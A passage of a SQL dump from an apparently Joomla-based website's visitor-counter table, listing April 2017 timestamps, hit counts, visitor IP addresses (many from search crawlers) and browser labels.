(103232,1493002255,1,0,1,0,'66.249.66.202',''),(103233,1493002813,1,1,0,0,'217.182.132.6','other'),(103234,1493003642,1,1,0,0,'217.182.132.37','other'),(103235,1493003949,1,1,0,0,'164.132.161.40','other'),(103236,1493003972,1,1,0,0,'130.180.217.173','opera'),(103237,1493004354,1,1,0,0,'217.69.133.219','other'),(103238,1493004952,1,1,0,0,'51.255.65.89','other'),(103239,1493005266,1,1,0,0,'217.69.133.246','other'),(103240,1493005498,1,1,0,0,'217.182.132.63','other'),(103241,1493005741,1,1,0,0,'164.132.162.188','other'),(103242,1493005927,1,1,0,0,'137.74.207.116','other'),(103243,1493006081,1,1,0,0,'51.255.65.65','other'),(103244,1493006214,1,1,0,0,'51.255.65.19','other'),(103245,1493007827,1,1,0,0,'51.255.65.71','other'),(103246,1493007841,1,1,0,0,'51.255.65.70','other'),(103247,1493007871,1,1,0,0,'216.244.66.237','other'),(103248,1493007888,1,1,0,0,'8.29.198.26','other'),(103249,1493008676,1,1,0,0,'91.196.178.70','firefox'),(103250,1493008677,1,1,0,0,'130.180.218.222','opera'),(103251,1493009088,1,1,0,0,'51.255.71.127','other'),(103252,1493009220,1,1,0,0,'157.55.39.31','other'),(103253,1493009559,1,1,0,0,'164.132.161.11','other'),(103254,1493010134,1,1,0,0,'130.180.219.237','opera'),(103255,1493010424,1,1,0,0,'217.182.132.180','other'),(103256,1493010586,1,1,0,0,'91.196.178.67','firefox'),(103257,1493010657,1,1,0,0,'51.255.65.85','other'),(103258,1493010725,1,0,1,0,'66.249.76.29',''),(103259,1493010799,1,1,0,0,'91.196.178.71','chrome'),(103260,1493010849,1,1,0,0,'164.132.161.7','other'),(103261,1493011476,1,1,0,0,'51.255.65.81','other'),(103262,1493011527,1,1,0,0,'78.154.179.134','firefox'),(103263,1493011852,1,1,0,0,'66.249.93.155','chrome'),(103264,1493011950,1,1,0,0,'91.213.33.174','firefox'),(103265,1493012136,1,1,0,0,'51.255.65.93','other'),(103266,1493012910,1,1,0,0,'91.196.178.40','chrome'),(103267,1493013040,1,1,0,0,'217.182.132.54','other'),(103268,1493013116,1,1,0,0,'164.132.161.12','other'),(103269,1493013171,1,1,0,0,'180.76.15.153','other'),(103270,1493013322,1,1,0,0,'217.182.132.92','other'),(103271,1493014162,1,1,0,0,'207.46.13.125','other'),(103272,1493014235,1,1,0,0,'51.255.65.224','other'),(103273,1493014418,1,1,0,0,'216.244.66.246','other'),(103274,1493014572,1,1,0,0,'78.111.190.55','firefox'),(103275,1493015254,1,1,0,0,'217.182.132.91','other'),(103276,1493015538,1,1,0,0,'95.132.60.1','firefox'),(103277,1493015791,1,1,0,0,'217.182.132.152','other'),(103278,1493016038,1,1,0,0,'51.255.65.2','other'),(103279,1493016044,1,1,0,0,'51.255.65.30','other'),(103280,1493016128,1,1,0,0,'216.244.66.237','other'),(103281,1493016159,1,1,0,0,'66.249.76.27','chrome'),(103282,1493016194,1,1,0,0,'91.196.178.68','chrome'),(103283,1493016203,1,1,0,0,'93.158.152.79','other'),(103284,1493016571,1,1,0,0,'91.196.178.72','chrome'),(103285,1493017040,1,1,0,0,'94.45.147.67','chrome'),(103286,1493017047,1,1,0,0,'141.8.132.43','other'),(103287,1493017124,1,1,0,0,'217.182.132.152','other'),(103288,1493017590,1,1,0,0,'164.132.161.52','other'),(103289,1493017615,1,1,0,0,'164.132.161.41','other'),(103290,1493017771,1,1,0,0,'157.55.39.31','other'),(103291,1493018075,1,1,0,0,'217.182.132.29','other'),(103292,1493018151,1,1,0,0,'217.182.132.17','other'),(103293,1493018199,1,1,0,0,'51.255.65.87','other'),(103294,1493018313,1,1,0,0,'91.196.178.67','firefox'),(103295,1493018513,1,1,0,0,'91.196.178.71','chrome'),(103296,1493018584,1,1,0,0,'51.255.65.29','other'),(103297,1493018652,1,1,0,0,'217.69.133.30','other'),(103298,1493018712,1,1,0,0,'8.29.198.25','other'),(103299,1493019319,1,1,0,0,'178.154.200.64','other'),(103300,1493019326,1,1,0,0,'141.8.132.25','other'),(103301,1493019752,1,1,0,0,'217.69.133.9','other'),(103302,1493019965,1,1,0,0,'213.186.202.241','chrome'),(103303,1493020637,1,1,0,0,'91.196.177.26','chrome'),(103304,1493020779,1,1,0,0,'164.132.162.153','other'),(103305,1493020923,1,1,0,0,'137.74.207.116','other'),(103306,1493020933,1,1,0,0,'51.255.65.70','other'),(103307,1493021812,1,1,0,0,'217.182.132.53','other'),(103308,1493021813,1,1,0,0,'51.255.65.63','other'),(103309,1493022289,1,0,1,0,'66.249.76.109',''),(103310,1493022306,1,1,0,0,'91.196.178.161','chrome'),(103311,1493022564,1,1,0,0,'95.132.47.133','firefox'),(103312,1493022587,1,0,1,0,'207.46.13.167',''),(103313,1493022937,1,1,0,0,'91.196.178.97','chrome'),(103314,1493023408,1,1,0,0,'217.182.132.172','other'),(103315,1493024114,1,1,0,0,'217.182.132.63','other'),(103316,1493024338,1,1,0,0,'91.196.178.71','chrome'),(103317,1493024347,1,1,0,0,'91.196.178.67','firefox'),(103318,1493024759,1,1,0,0,'91.196.178.97','chrome'),(103319,1493024773,1,1,0,0,'164.132.161.93','other'),(103320,1493025541,1,1,0,0,'217.69.133.59','other'),(103321,1493025892,1,1,0,0,'51.255.65.75','other'),(103322,1493026254,1,1,0,0,'31.43.31.129','chrome'),(103323,1493026405,1,1,0,0,'217.182.132.191','other'),(103324,1493026412,1,1,0,0,'51.255.71.116','other'),(103325,1493026539,1,1,0,0,'51.255.65.79','other'),(103326,1493026544,1,1,0,0,'149.62.55.212','chrome'),(103327,1493026548,1,1,0,0,'195.10.210.49','chrome'),(103328,1493027523,1,1,0,0,'217.69.133.68','other'),(103329,1493027879,1,1,0,0,'178.92.171.23','chrome'),(103330,1493028448,1,1,0,0,'91.196.177.46','chrome'),(103331,1493029059,1,1,0,0,'91.196.178.65','firefox'),(103332,1493029152,1,1,0,0,'37.52.158.196','chrome'),(103333,1493029240,1,1,0,0,'66.249.76.107','chrome'),(103334,1493029299,1,1,0,0,'91.196.178.161','chrome'),(103335,1493029408,1,1,0,0,'91.196.178.65','chrome'),(103336,1493029541,1,1,0,0,'8.29.198.25','other'),(103337,1493030339,1,1,0,0,'91.196.178.65','chrome'),(103338,1493030361,1,1,0,0,'194.44.145.110','chrome'),(103339,1493032528,1,1,0,0,'91.196.177.46','chrome'),(103340,1493032530,1,0,1,0,'66.249.76.27',''),(103341,1493032679,1,1,0,0,'91.196.177.26','chrome'),(103342,1493032998,2,2,0,0,'91.196.178.71','chrome'),(103343,1493033485,2,2,0,0,'207.46.13.125','other'),(103344,1493033769,1,1,0,0,'91.196.177.26','chrome'),(103345,1493033773,1,1,0,0,'193.107.72.66','chrome'),(103346,1493034397,1,1,0,0,'217.182.132.60','other'),(103347,1493034641,1,1,0,0,'51.255.71.100','other'),(103348,1493034651,1,1,0,0,'217.182.132.178','other'),(103349,1493035803,2,2,0,0,'91.196.178.71','chrome'),(103350,1493036004,1,1,0,0,'95.24.112.214','msie'),(103351,1493036294,1,1,0,0,'37.73.230.15','chrome'),(103352,1493036563,1,0,1,0,'207.46.13.125',''),(103353,1493036643,1,1,0,0,'195.200.91.254','chrome'),(103354,1493036728,1,1,0,0,'207.46.13.173','other'),(103355,1493036911,1,1,0,0,'31.43.7.70','chrome'),(103356,1493037506,1,1,0,0,'217.69.133.85','other'),(103357,1493037721,1,1,0,0,'91.196.177.26','chrome'),(103358,1493038341,1,1,0,0,'216.244.66.246','other'),(103359,1493039721,1,1,0,0,'78.111.190.58','opera'),(103360,1493039851,1,1,0,0,'176.195.104.187','msie'),(103361,1493040196,1,1,0,0,'93.80.148.251','msie'),(103362,1493040366,1,1,0,0,'8.29.198.26','other'),(103363,1493040640,1,1,0,0,'91.196.178.65','firefox'),(103364,1493040863,1,1,0,0,'46.201.240.111','chrome'),(103365,1493042306,1,1,0,0,'93.158.152.79','other'),(103366,1493042501,1,1,0,0,'217.69.133.193','other'),(103367,1493042832,1,1,0,0,'5.255.253.83','other'),(103368,1493043063,1,1,0,0,'92.113.189.192','chrome'),(103369,1493043066,1,1,0,0,'207.46.13.167','other'),(103370,1493043316,1,1,0,0,'91.196.177.46','firefox'),(103371,1493043554,1,1,0,0,'141.8.142.15','other'),(103372,1493043636,1,1,0,0,'217.69.133.223','other'),(103373,1493044017,1,1,0,0,'46.219.33.172','chrome'),(103374,1493044595,1,0,1,0,'66.249.76.109',''),(103375,1493044950,1,1,0,0,'91.196.178.38','chrome'),(103376,1493045605,1,1,0,0,'217.69.133.221','other'),(103377,1493045710,1,1,0,0,'130.180.216.162','opera'),(103378,1493047282,1,1,0,0,'37.144.46.242','msie'),(103379,1493047606,1,1,0,0,'217.182.132.63','other'),(103380,1493047718,1,1,0,0,'217.69.134.182','other'),(103381,1493048135,1,1,0,0,'164.132.161.11','other'),(103382,1493048319,1,1,0,0,'51.255.71.100','other'),(103383,1493048508,1,1,0,0,'164.132.161.61','other'),(103384,1493048618,1,1,0,0,'216.244.66.237','other'),(103385,1493048798,1,1,0,0,'51.255.65.5','other'),(103386,1493048918,1,1,0,0,'185.138.228.227','chrome'),(103387,1493049144,1,1,0,0,'217.69.134.175','other'),(103388,1493049885,1,1,0,0,'164.132.161.71','other'),(103389,1493050067,1,1,0,0,'217.182.132.27','other'),(103390,1493050087,1,1,0,0,'217.182.132.149','other'),(103391,1493050549,1,0,1,0,'66.249.76.108',''),(103392,1493051204,1,1,0,0,'8.29.198.26','other'),(103393,1493051273,1,1,0,0,'217.182.132.192','other'),(103394,1493051549,1,1,0,0,'51.255.65.13','other'),(103395,1493051720,1,1,0,0,'91.196.178.161','chrome'),(103396,1493052080,1,1,0,0,'164.132.161.75','other'),(103397,1493052576,1,1,0,0,'217.69.134.176','other'),(103398,1493052702,1,1,0,0,'217.69.134.174','other'),(103399,1493052759,1,1,0,0,'164.132.161.63','other'),(103400,1493052810,1,1,0,0,'91.196.178.99','chrome'),(103401,1493052815,2,2,0,0,'217.69.135.191','other'),(103402,1493052913,1,1,0,0,'91.196.178.168','chrome'),(103403,1493053115,1,1,0,0,'157.55.39.31','other'),(103404,1493053129,1,0,1,0,'66.249.76.28',''),(103405,1493053319,1,1,0,0,'217.182.132.66','other'),(103406,1493053929,1,1,0,0,'164.132.161.76','other'),(103407,1493054072,1,1,0,0,'164.132.161.35','other'),(103408,1493054653,2,0,2,0,'66.249.66.210',''),(103409,1493054717,1,0,1,0,'66.249.66.202',''),(103410,1493054746,1,1,0,0,'164.132.161.34','other'),(103411,1493054994,1,1,0,0,'51.255.65.76','other'),(103412,1493055369,1,1,0,0,'94.178.146.56','chrome'),(103413,1493055554,1,1,0,0,'130.180.220.228','opera'),(103414,1493055628,1,1,0,0,'91.196.178.161','chrome'),(103415,1493055724,1,1,0,0,'217.182.132.54','other'),(103416,1493055733,2,0,2,0,'66.249.66.84',''),(103417,1493055803,1,1,0,0,'217.182.132.25','other'),(103418,1493055891,1,1,0,0,'217.182.132.181','other'),(103419,1493056538,1,1,0,0,'217.69.133.193','other'),(103420,1493057582,1,1,0,0,'217.182.132.92','other'),(103421,1493057674,1,1,0,0,'91.196.178.165','chrome'),(103422,1493057684,1,1,0,0,'75.98.9.249','other'),(103423,1493058332,1,1,0,0,'51.255.65.56','other'),(103424,1493058384,1,1,0,0,'51.255.65.23','other'),(103425,1493058724,1,1,0,0,'164.132.161.62','other'),(103426,1493059107,1,1,0,0,'82.145.220.243','other'),(103427,1493059216,1,1,0,0,'37.55.225.82','chrome'),(103428,1493059454,1,1,0,0,'199.30.24.198','other'),(103429,1493059543,1,0,1,0,'66.249.76.28',''),(103430,1493059806,1,1,0,0,'217.182.132.7','other'),(103431,1493059864,1,1,0,0,'82.145.222.83','other'),(103432,1493059927,1,1,0,0,'51.255.65.64','other'),(103433,1493060067,1,0,1,0,'66.249.76.107',''),(103434,1493060144,1,1,0,0,'217.69.133.230','other'),(103435,1493060257,1,1,0,0,'51.255.65.34','other'),(103436,1493060289,2,2,0,0,'216.244.66.246','other'),(103437,1493060809,1,1,0,0,'51.255.65.94','other'),(103438,1493061314,1,0,1,0,'66.249.76.27',''),(103439,1493061374,1,1,0,0,'51.255.71.131','other'),(103440,1493061756,1,1,0,0,'164.132.161.16','other'),(103441,1493061767,1,1,0,0,'207.46.13.173','other'),(103442,1493062040,1,1,0,0,'8.29.198.25','other'),(103443,1493062282,1,1,0,0,'217.182.132.50','other'),(103444,1493062388,1,1,0,0,'164.132.161.52','other'),(103445,1493062883,1,1,0,0,'217.182.132.65','other'),(103446,1493062973,1,1,0,0,'51.255.65.49','other'),(103447,1493063026,1,1,0,0,'137.74.207.159','other'),(103448,1493063199,1,1,0,0,'217.182.132.80','other'),(103449,1493064822,1,0,1,0,'66.249.76.109',''),(103450,1493065372,1,1,0,0,'137.74.207.161','other'),(103451,1493065531,1,1,0,0,'51.255.65.67','other'),(103452,1493065622,1,1,0,0,'46.147.216.132','msie'),(103453,1493065629,1,1,0,0,'164.132.161.47','other'),(103454,1493065944,1,1,0,0,'176.213.137.103','msie'),(103455,1493066369,1,0,1,0,'66.249.76.107',''),(103456,1493066441,1,1,0,0,'207.46.13.125','other'),(103457,1493066593,1,1,0,0,'164.132.161.69','other'),(103458,1493066833,1,1,0,0,'51.255.65.5','other'),(103459,1493067120,1,1,0,0,'164.132.161.26','other'),(103460,1493067125,2,2,0,0,'216.244.66.237','other'),(103461,1493067144,1,1,0,0,'37.204.152.138','msie'),(103462,1493067154,1,1,0,0,'51.255.65.37','other'),(103463,1493067284,1,1,0,0,'164.132.161.20','other'),(103464,1493067316,1,1,0,0,'51.255.65.9','other'),(103466,1493067562,1,1,0,0,'164.132.161.74','other'),(103467,1493067797,1,1,0,0,'51.255.65.25','other'),(103468,1493067829,1,1,0,0,'46.188.40.119','msie'),(103469,1493067973,1,1,0,0,'217.182.132.176','other'),(103470,1493068096,1,1,0,0,'51.255.65.75','other'),(103471,1493068225,1,1,0,0,'176.195.100.75','msie'),(103472,1493068803,1,1,0,0,'51.255.65.65','other'),(103473,1493069019,1,1,0,0,'51.255.65.30','other'),(103474,1493069104,1,0,1,0,'66.249.76.27',''),(103475,1493070462,1,1,0,0,'164.132.162.157','other'),(103476,1493070546,1,1,0,0,'51.255.65.37','other'),(103477,1493070636,1,1,0,0,'217.69.133.192','other'),(103478,1493071908,1,1,0,0,'51.255.71.118','other'),(103479,1493071999,2,2,0,0,'216.244.66.246','other'),(103480,1493072813,1,1,0,0,'164.132.161.73','other'),(103481,1493072866,1,1,0,0,'8.29.198.27','other'),(103482,1493072881,1,1,0,0,'51.255.65.14','other'),(103483,1493073924,1,0,1,0,'66.249.66.210',''),(103484,1493074002,1,1,0,0,'164.132.162.154','other'),(103485,1493074247,1,1,0,0,'217.182.132.76','other'),(103486,1493074303,1,1,0,0,'207.46.13.125','other'),(103487,1493074840,1,1,0,0,'51.255.65.30','other'),(103488,1493075037,1,1,0,0,'217.182.132.187','other'),(103489,1493075442,1,0,1,0,'66.249.66.81',''),(103490,1493075486,1,1,0,0,'164.132.161.75','other'),(103491,1493075857,1,1,0,0,'51.255.65.82','other'),(103492,1493075980,1,1,0,0,'217.182.132.156','other'),(103493,1493076720,1,1,0,0,'164.132.161.87','other'),(103494,1493076921,1,1,0,0,'164.132.161.41','other'),(103495,1493077803,1,1,0,0,'51.255.65.69','other'),(103496,1493078512,1,1,0,0,'51.255.71.133','other'),(103497,1493079052,1,1,0,0,'217.182.132.61','other'),(103498,1493079162,1,0,1,0,'207.46.13.105',''),(103499,1493079749,1,1,0,0,'217.69.133.85','other'),(103500,1493080052,1,1,0,0,'217.182.132.51','other'),(103501,1493081403,1,1,0,0,'217.182.132.185','other'),(103502,1493081853,2,2,0,0,'141.8.142.154','other'),(103503,1493081924,1,1,0,0,'95.108.179.15','other'),(103504,1493081940,1,1,0,0,'141.8.142.15','other'),(103505,1493082418,1,0,1,0,'66.249.76.29',''),(103506,1493083694,1,1,0,0,'8.29.198.26','other'),(103507,1493084117,1,1,0,0,'164.132.161.81','other'),(103508,1493084145,1,1,0,0,'137.74.207.188','other'),(103509,1493084980,1,1,0,0,'217.182.132.241','other'),(103510,1493085179,1,1,0,0,'51.255.71.110','other'),(103511,1493085190,1,1,0,0,'217.182.132.52','other'),(103512,1493085280,1,1,0,0,'217.182.132.96','other'),(103513,1493085460,1,1,0,0,'217.182.132.97','other'),(103514,1493085698,1,1,0,0,'216.244.66.237','other'),(103515,1493086271,1,0,1,0,'66.249.76.109',''),(103516,1493086626,1,1,0,0,'51.255.65.45','other'),(103517,1493087551,1,0,1,0,'66.249.66.197',''),(103518,1493087662,1,0,1,0,'66.249.76.28',''),(103519,1493087851,1,1,0,0,'164.132.161.86','other'),(103520,1493087922,1,0,1,0,'66.249.76.29',''),(103521,1493088149,1,1,0,0,'217.182.132.74','other'),(103522,1493088207,1,1,0,0,'51.255.65.85','other'),(103523,1493088255,1,1,0,0,'217.182.132.71','other'),(103524,1493088568,1,1,0,0,'51.255.71.131','other'),(103525,1493089088,1,0,1,0,'66.249.76.109',''),(103526,1493089771,1,1,0,0,'40.77.167.58','other'),(103527,1493090205,1,1,0,0,'51.255.71.122','other'),(103528,1493090531,1,1,0,0,'164.132.161.94','other'),(103529,1493090760,1,1,0,0,'78.111.190.4','opera'),(103530,1493091128,1,1,0,0,'164.132.161.28','other'),(103531,1493091235,1,1,0,0,'217.182.132.75','other'),(103532,1493091936,1,1,0,0,'217.182.132.241','other'),(103533,1493092132,1,1,0,0,'164.132.161.89','other'),(103534,1493092154,1,1,0,0,'51.255.65.2','other'),(103535,1493092256,1,0,1,0,'66.249.66.202',''),(103536,1493092330,1,1,0,0,'164.132.161.88','other'),(103537,1493092379,1,1,0,0,'51.255.65.65','other'),(103538,1493093055,1,1,0,0,'51.255.65.91','other'),(103539,1493093345,1,1,0,0,'51.255.71.117','other'),(103540,1493093662,1,1,0,0,'216.244.66.246','other'),(103541,1493093695,1,1,0,0,'51.255.71.113','other'),(103542,1493093958,1,1,0,0,'91.196.178.99','chrome'),(103543,1493094184,2,2,0,0,'216.244.66.237','other'),(103544,1493094523,1,1,0,0,'8.29.198.25','other'),(103545,1493094711,1,1,0,0,'51.255.65.10','other'),(103546,1493094941,1,1,0,0,'217.182.132.86','other'),(103547,1493095475,1,1,0,0,'91.196.178.69','firefox'),(103548,1493095774,1,0,1,0,'66.249.76.28',''),(103549,1493095946,1,1,0,0,'51.255.65.78','other'),(103550,1493096787,2,2,0,0,'216.244.66.237','other'),(103551,1493096926,1,1,0,0,'164.132.161.11','other'),(103552,1493097006,1,1,0,0,'91.196.178.67','firefox'),(103553,1493097159,1,1,0,0,'51.255.65.90','other'),(103554,1493097180,1,1,0,0,'51.255.65.60','other'),(103555,1493097494,1,1,0,0,'217.182.132.33','other'),(103556,1493097684,1,1,0,0,'77.222.134.100','firefox'),(103557,1493098025,1,1,0,0,'200.32.192.2','firefox'),(103558,1493098478,1,1,0,0,'46.219.243.134','chrome'),(103559,1493098677,1,1,0,0,'91.196.178.71','chrome'),(103560,1493098801,1,1,0,0,'66.249.93.157','chrome'),(103561,1493098933,1,1,0,0,'164.132.161.39','other'),(103562,1493098977,1,1,0,0,'37.53.123.143','firefox'),(103563,1493099216,1,1,0,0,'217.182.132.70','other'),(103564,1493099846,1,1,0,0,'91.196.178.69','chrome'),(103565,1493100277,1,1,0,0,'46.219.243.134','chrome'),(103566,1493100444,1,1,0,0,'164.132.161.63','other'),(103567,1493100699,1,1,0,0,'176.31.231.10','other'),(103568,1493100822,1,1,0,0,'217.182.132.172','other'),(103569,1493100840,1,1,0,0,'46.229.168.68','other'),(103570,1493100851,5,5,0,0,'46.229.168.73','other'),(103571,1493100865,4,4,0,0,'46.229.168.66','other'),(103572,1493100873,3,3,0,0,'46.229.168.75','other'),(103573,1493100907,4,4,0,0,'46.229.168.71','other'),(103574,1493100917,5,5,0,0,'46.229.168.69','other'),(103575,1493101061,4,4,0,0,'46.229.168.65','other'),(103576,1493101111,3,3,0,0,'46.229.168.70','other'),(103577,1493101123,1,1,0,0,'46.229.168.74','other'),(103578,1493101148,1,1,0,0,'46.229.168.72','other'),(103579,1493101550,1,1,0,0,'217.182.132.82','other'),(103580,1493101728,1,1,0,0,'217.182.132.4','other'),(103581,1493102077,1,1,0,0,'46.219.243.134','chrome'),(103582,1493102218,1,1,0,0,'217.69.133.10','other'),(103583,1493102349,1,1,0,0,'51.255.71.127','other'),(103584,1493102509,1,1,0,0,'95.132.18.236','chrome'),(103585,1493102632,1,1,0,0,'37.54.32.15','firefox'),(103586,1493102892,1,1,0,0,'217.182.132.5','other'),(103587,1493103100,1,0,1,0,'66.249.76.29',''),(103588,1493103106,1,1,0,0,'91.196.178.67','firefox'),(103589,1493103564,1,1,0,0,'217.182.132.240','other'),(103590,1493103717,1,1,0,0,'217.69.133.244','other'),(103591,1493103864,1,1,0,0,'51.255.65.41','other'),(103592,1493103877,1,1,0,0,'46.219.243.134','chrome'),(103593,1493104018,1,1,0,0,'164.132.161.72','other'),(103594,1493104419,1,1,0,0,'216.244.66.246','other'),(103595,1493104480,1,1,0,0,'37.53.123.143','firefox'),(103596,1493104613,1,1,0,0,'37.53.123.143','chrome'),(103597,1493105267,1,0,1,0,'66.249.76.107',''),(103598,1493105356,1,1,0,0,'8.29.198.27','other'),(103599,1493105437,1,1,0,0,'164.132.161.53','other'),(103600,1493105449,1,1,0,0,'217.182.132.149','other'),(103601,1493105569,1,1,0,0,'217.182.132.37','other'),(103602,1493105598,1,1,0,0,'51.255.65.93','other'),(103603,1493105677,1,1,0,0,'46.219.243.134','chrome'),(103604,1493105788,2,2,0,0,'178.255.215.94','other'),(103605,1493106034,1,1,0,0,'91.196.177.26','chrome'),(103606,1493106073,1,1,0,0,'78.111.190.193','firefox'),(103607,1493106170,1,1,0,0,'51.255.65.26','other'),(103608,1493106483,1,1,0,0,'95.132.26.128','firefox'),(103609,1493106754,1,1,0,0,'91.196.178.68','chrome');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (103610,1493107081,1,1,0,0,'91.196.177.26','chrome'),(103611,1493107173,1,1,0,0,'178.92.171.23','chrome'),(103612,1493107365,1,1,0,0,'217.182.132.90','other'),(103613,1493107463,1,1,0,0,'164.132.161.46','other'),(103614,1493107489,1,1,0,0,'46.219.243.134','chrome'),(103615,1493107521,1,1,0,0,'217.182.132.173','other'),(103616,1493107531,1,1,0,0,'217.182.132.59','other'),(103617,1493107570,1,1,0,0,'164.132.162.155','other'),(103618,1493108638,1,1,0,0,'95.132.26.128','firefox'),(103619,1493109277,1,1,0,0,'46.219.243.134','chrome'),(103620,1493111018,1,1,0,0,'217.182.132.173','other'),(103621,1493111056,1,1,0,0,'164.132.161.94','other'),(103622,1493111081,1,1,0,0,'46.219.243.134','chrome'),(103623,1493111267,1,1,0,0,'217.182.132.22','other'),(103624,1493111420,1,1,0,0,'51.255.71.119','other'),(103625,1493111432,2,2,0,0,'88.153.8.11','other'),(103626,1493112423,1,1,0,0,'51.255.65.28','other'),(103627,1493112878,1,1,0,0,'46.219.243.134','chrome'),(103628,1493113300,1,1,0,0,'180.76.15.28','other'),(103629,1493114122,1,1,0,0,'91.196.178.72','firefox'),(103630,1493114513,1,1,0,0,'164.132.161.83','other'),(103631,1493114687,1,1,0,0,'46.219.243.134','chrome'),(103632,1493115526,1,0,1,0,'66.249.76.29',''),(103633,1493115857,1,1,0,0,'164.132.161.46','other'),(103634,1493116141,1,1,0,0,'51.255.65.38','other'),(103635,1493116178,1,1,0,0,'8.29.198.27','other'),(103636,1493116194,1,1,0,0,'51.255.65.22','other'),(103637,1493116478,1,1,0,0,'46.219.243.134','chrome'),(103638,1493116635,1,1,0,0,'91.196.178.163','chrome'),(103639,1493116715,1,1,0,0,'178.92.171.23','chrome'),(103640,1493116894,1,1,0,0,'77.52.178.162','firefox'),(103641,1493117010,1,1,0,0,'94.153.163.230','chrome'),(103642,1493117326,1,1,0,0,'51.255.65.68','other'),(103643,1493117712,1,1,0,0,'51.255.65.72','other'),(103644,1493117850,1,1,0,0,'91.196.178.68','other'),(103645,1493118067,1,1,0,0,'217.69.133.222','other'),(103646,1493118097,1,1,0,0,'91.196.178.166','chrome'),(103647,1493118278,1,1,0,0,'46.219.243.134','chrome'),(103648,1493120080,1,1,0,0,'91.196.178.136','firefox'),(103649,1493120088,1,1,0,0,'46.219.243.134','chrome'),(103650,1493121109,1,1,0,0,'46.161.9.30','chrome'),(103651,1493121527,1,1,0,0,'91.196.177.26','chrome'),(103652,1493121599,1,1,0,0,'95.135.90.89','chrome'),(103653,1493121878,1,1,0,0,'46.219.243.134','chrome'),(103654,1493121930,1,1,0,0,'178.137.210.184','chrome'),(103655,1493122344,2,2,0,0,'130.180.216.2','opera'),(103656,1493122568,1,1,0,0,'51.255.71.127','other'),(103657,1493123678,1,1,0,0,'46.219.243.134','chrome'),(103658,1493123934,1,1,0,0,'164.132.161.12','other'),(103659,1493124023,1,1,0,0,'91.196.178.67','firefox'),(103660,1493124072,1,1,0,0,'95.132.5.130','firefox'),(103661,1493124343,1,1,0,0,'51.255.65.27','other'),(103662,1493124897,1,1,0,0,'164.132.161.60','other'),(103663,1493124993,1,1,0,0,'51.255.65.82','other'),(103664,1493125398,1,1,0,0,'77.222.134.100','firefox'),(103665,1493125478,1,1,0,0,'46.219.243.134','chrome'),(103666,1493125485,1,1,0,0,'37.53.123.143','firefox'),(103667,1493125663,1,1,0,0,'95.134.213.221','chrome'),(103668,1493125718,1,1,0,0,'217.69.133.229','other'),(103669,1493126008,1,1,0,0,'51.255.71.128','other'),(103670,1493126294,1,0,1,0,'66.249.76.71',''),(103671,1493126749,1,1,0,0,'217.182.132.192','other'),(103672,1493126827,1,1,0,0,'91.196.178.72','firefox'),(103673,1493127017,1,1,0,0,'8.29.198.26','other'),(103674,1493127028,1,0,1,0,'66.249.76.73',''),(103675,1493127216,1,1,0,0,'164.132.161.27','other'),(103676,1493127278,1,1,0,0,'46.219.243.134','chrome'),(103677,1493127647,1,1,0,0,'217.182.132.27','other'),(103678,1493127791,1,1,0,0,'217.182.132.73','other'),(103679,1493127910,1,1,0,0,'51.255.65.81','other'),(103680,1493128073,1,1,0,0,'51.255.65.30','other'),(103681,1493128280,1,1,0,0,'217.182.132.182','other'),(103682,1493128303,1,1,0,0,'217.182.132.96','other'),(103683,1493128892,1,1,0,0,'51.255.71.116','other'),(103684,1493129024,1,1,0,0,'91.196.178.68','chrome'),(103685,1493129087,1,1,0,0,'46.219.243.134','chrome'),(103686,1493129100,1,1,0,0,'51.255.65.60','other'),(103687,1493129206,1,1,0,0,'91.209.11.236','other'),(103688,1493129312,1,1,0,0,'217.182.132.86','other'),(103689,1493129463,1,1,0,0,'217.69.133.203','other'),(103690,1493129673,1,1,0,0,'51.255.65.77','other'),(103691,1493129700,1,1,0,0,'77.222.134.100','firefox'),(103692,1493129706,1,1,0,0,'91.196.178.68','msie'),(103693,1493130239,1,1,0,0,'164.132.161.44','other'),(103694,1493130887,1,1,0,0,'46.219.243.134','chrome'),(103695,1493130979,1,0,1,0,'207.46.13.184',''),(103696,1493131096,1,1,0,0,'217.182.132.17','other'),(103697,1493131131,1,1,0,0,'109.254.254.19','other'),(103698,1493131452,1,1,0,0,'164.132.161.44','other'),(103699,1493131467,1,1,0,0,'51.255.65.81','other'),(103700,1493131772,1,1,0,0,'180.76.15.153','other'),(103701,1493132004,1,1,0,0,'217.182.132.34','other'),(103702,1493132388,1,1,0,0,'31.148.255.140','chrome'),(103703,1493132453,1,1,0,0,'217.182.132.65','other'),(103704,1493132481,1,1,0,0,'217.182.132.97','other'),(103705,1493133370,1,1,0,0,'217.182.132.77','other'),(103706,1493135689,1,1,0,0,'66.102.9.29','chrome'),(103707,1493136544,1,1,0,0,'51.255.65.71','other'),(103708,1493136592,1,1,0,0,'51.255.71.130','other'),(103709,1493136730,1,1,0,0,'164.132.161.23','other'),(103710,1493136873,1,1,0,0,'164.132.161.65','other'),(103711,1493137044,1,1,0,0,'207.46.13.184','other'),(103712,1493137607,1,1,0,0,'51.255.65.78','other'),(103713,1493137689,1,1,0,0,'51.255.71.117','other'),(103714,1493137853,1,1,0,0,'8.29.198.27','other'),(103715,1493139077,1,1,0,0,'164.132.161.30','other'),(103716,1493139268,1,1,0,0,'51.255.65.40','other'),(103717,1493139385,1,1,0,0,'217.182.132.155','other'),(103718,1493139752,1,1,0,0,'217.182.132.78','other'),(103719,1493139995,1,1,0,0,'217.182.132.22','other'),(103720,1493140302,1,0,1,0,'66.249.66.87',''),(103721,1493140334,1,1,0,0,'164.132.161.29','other'),(103722,1493140339,1,1,0,0,'164.132.161.61','other'),(103723,1493141169,1,0,1,0,'40.77.167.58',''),(103724,1493141689,1,1,0,0,'178.92.84.154','chrome'),(103725,1493141715,1,1,0,0,'180.76.15.34','other'),(103726,1493141816,1,1,0,0,'51.255.65.59','other'),(103727,1493142886,1,1,0,0,'91.196.178.65','chrome'),(103728,1493143168,1,1,0,0,'217.182.132.62','other'),(103729,1493143533,1,1,0,0,'216.244.66.246','other'),(103730,1493144291,1,1,0,0,'51.255.65.46','other'),(103731,1493144843,1,1,0,0,'164.132.161.51','other'),(103732,1493145207,1,1,0,0,'91.196.178.166','chrome'),(103733,1493145533,1,1,0,0,'137.74.207.102','other'),(103734,1493146008,1,1,0,0,'178.94.44.204','chrome'),(103735,1493146047,1,1,0,0,'40.77.167.58','other'),(103736,1493146118,1,0,1,0,'66.249.76.73',''),(103737,1493146839,1,1,0,0,'164.132.161.19','other'),(103738,1493147089,1,1,0,0,'164.132.161.75','other'),(103739,1493147418,1,1,0,0,'137.74.201.100','other'),(103740,1493147528,1,1,0,0,'164.132.161.24','other'),(103741,1493147747,1,1